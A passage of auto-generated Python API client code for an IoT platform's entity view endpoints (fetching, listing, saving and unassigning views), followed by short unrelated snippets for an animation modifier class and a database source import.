asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_entity_view_by_id_using_get_with_http_info(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_entity_view_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `get_entity_view_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entityView/{entityViewId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_entity_view_info_by_id_using_get(self, entity_view_id, **kwargs): # noqa: E501
"""Get Entity View info (getEntityViewInfoById) # noqa: E501
Fetch the Entity View info object based on the provided Entity View Id. Entity Views Info extends the Entity View with customer title and 'is public' flag. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_entity_view_info_by_id_using_get(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_entity_view_info_by_id_using_get_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.get_entity_view_info_by_id_using_get_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
def get_entity_view_info_by_id_using_get_with_http_info(self, entity_view_id, **kwargs): # noqa: E501
"""Get Entity View info (getEntityViewInfoById) # noqa: E501
Fetch the Entity View info object based on the provided Entity View Id. Entity Views Info extends the Entity View with customer title and 'is public' flag. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_entity_view_info_by_id_using_get_with_http_info(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_entity_view_info_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `get_entity_view_info_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entityView/info/{entityViewId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityViewInfo', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_entity_view_types_using_get(self, **kwargs): # noqa: E501
"""Get Entity View Types (getEntityViewTypes) # noqa: E501
Returns a set of unique entity view types based on entity views that are either owned by the tenant or assigned to the customer which user is performing the request. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_entity_view_types_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[EntitySubtype]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_entity_view_types_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_entity_view_types_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_entity_view_types_using_get_with_http_info(self, **kwargs): # noqa: E501
"""Get Entity View Types (getEntityViewTypes) # noqa: E501
Returns a set of unique entity view types based on entity views that are either owned by the tenant or assigned to the customer which user is performing the request. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_entity_view_types_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[EntitySubtype]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_entity_view_types_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entityView/types', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EntitySubtype]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tenant_entity_view_infos_using_get(self, page_size, page, **kwargs): # noqa: E501
"""Get Tenant Entity Views (getTenantEntityViews) # noqa: E501
Returns a page of entity views info owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tenant_entity_view_infos_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tenant_entity_view_infos_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_tenant_entity_view_infos_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
def get_tenant_entity_view_infos_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501
"""Get Tenant Entity Views (getTenantEntityViews) # noqa: E501
Returns a page of entity views info owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tenant_entity_view_infos_using_get_with_http_info(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tenant_entity_view_infos_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_tenant_entity_view_infos_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_tenant_entity_view_infos_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/tenant/entityViewInfos{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityViewInfo', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tenant_entity_view_using_get(self, entity_view_name, **kwargs): # noqa: E501
"""Get Entity View by name (getTenantEntityView) # noqa: E501
Fetch the Entity View object based on the tenant id and entity view name. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tenant_entity_view_using_get(entity_view_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_name: Entity View name (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tenant_entity_view_using_get_with_http_info(entity_view_name, **kwargs) # noqa: E501
else:
(data) = self.get_tenant_entity_view_using_get_with_http_info(entity_view_name, **kwargs) # noqa: E501
return data
def get_tenant_entity_view_using_get_with_http_info(self, entity_view_name, **kwargs): # noqa: E501
"""Get Entity View by name (getTenantEntityView) # noqa: E501
Fetch the Entity View object based on the tenant id and entity view name. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tenant_entity_view_using_get_with_http_info(entity_view_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_name: Entity View name (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_view_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tenant_entity_view_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_view_name' is set
if ('entity_view_name' not in params or
params['entity_view_name'] is None):
raise ValueError("Missing the required parameter `entity_view_name` when calling `get_tenant_entity_view_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'entity_view_name' in params:
query_params.append(('entityViewName', params['entity_view_name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/tenant/entityViews{?entityViewName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tenant_entity_views_using_get(self, page_size, page, **kwargs): # noqa: E501
"""Get Tenant Entity Views (getTenantEntityViews) # noqa: E501
Returns a page of entity views owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tenant_entity_views_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tenant_entity_views_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_tenant_entity_views_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
def get_tenant_entity_views_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501
"""Get Tenant Entity Views (getTenantEntityViews) # noqa: E501
Returns a page of entity views owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tenant_entity_views_using_get_with_http_info(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tenant_entity_views_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_tenant_entity_views_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_tenant_entity_views_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/tenant/entityViews{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_entity_view_using_post(self, **kwargs): # noqa: E501
"""Save or update entity view (saveEntityView) # noqa: E501
Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_entity_view_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityView body:
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_entity_view_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.save_entity_view_using_post_with_http_info(**kwargs) # noqa: E501
return data
def save_entity_view_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Save or update entity view (saveEntityView) # noqa: E501
Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_entity_view_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityView body:
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save_entity_view_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entityView', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def unassign_entity_view_from_customer_using_delete(self, entity_view_id, **kwargs): # noqa: E501
"""Unassign Entity View from customer (unassignEntityViewFromCustomer) # noqa: E501
Clears assignment of the Entity View to customer. Customer will not be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unassign_entity_view_from_customer_using_delete(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.unassign_entity_view_from_customer_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.unassign_entity_view_from_customer_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
def unassign_entity_view_from_customer_using_delete_with_http_info(self, entity_view_id, **kwargs): # noqa: E501
"""Unassign Entity View from customer (unassignEntityViewFromCustomer) # noqa: E501
Clears assignment of the Entity View to customer. Customer will not be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unassign_entity_view_from_customer_using_delete_with_http_info(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method unassign_entity_view_from_customer_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `unassign_entity_view_from_customer_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/entityView/{entityViewId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def unassign_entity_view_from_edge_using_delete(self, edge_id, entity_view_id, **kwargs): # noqa: E501
"""Unassign entity view from edge (unassignEntityViewFromEdge) # noqa: E501
Clears assignment of the entity view to the edge. Unassignment works in async way - first, 'unassign' notification event pushed to edge queue on platform. Second, remote edge service will receive an 'unassign' command to remove entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once 'unassign' command will be delivered to edge service, it's going to remove entity view locally. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unassign_entity_view_from_edge_using_delete(edge_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str entity_view_id: entityViewId (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.unassign_entity_view_from_edge_using_delete_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.unassign_entity_view_from_edge_using_delete_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
return data
def unassign_entity_view_from_edge_using_delete_with_http_info(self, edge_id, entity_view_id, **kwargs): # noqa: E501
"""Unassign entity view from edge (unassignEntityViewFromEdge) # noqa: E501
Clears assignment of the entity view to the edge. Unassignment works in async way - first, 'unassign' notification event pushed to edge queue on platform. Second, remote edge service will receive an 'unassign' command to remove entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once 'unassign' command will be delivered to edge service, it's going to remove entity view locally. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unassign_entity_view_from_edge_using_delete_with_http_info(edge_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str entity_view_id: entityViewId (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['edge_id', 'entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method unassign_entity_view_from_edge_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'edge_id' is set
if ('edge_id' not in params or
params['edge_id'] is None):
raise ValueError("Missing the required parameter `edge_id` when calling `unassign_entity_view_from_edge_using_delete`") # noqa: E501
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `unassign_entity_view_from_edge_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'edge_id' in params:
path_params['edgeId'] = params['edge_id'] # noqa: E501
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/edge/{edgeId}/entityView/{entityViewId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| StarcoderdataPython |
11297191 | class FModifierFunctionGenerator:
amplitude = None
function_type = None
phase_multiplier = None
phase_offset = None
use_additive = None
value_offset = None
| StarcoderdataPython |
11206941 | # This import verifies that the dependencies are available.
import psycopg2 # noqa: F401
# GeoAlchemy adds support for PostGIS extensions in SQLAlchemy. In order to
# activate it, we must import it so that it can hook into SQLAlchemy. While
# we don't use the Geometry type that we import, we do care about the side
# effects of the import. For more details, see here:
# https://geoalchemy-2.readthedocs.io/en/latest/core_tutorial.html#reflecting-tables.
from geoalchemy2 import Geometry # noqa: F401
from .sql_common import BasicSQLAlchemyConfig, SQLAlchemySource
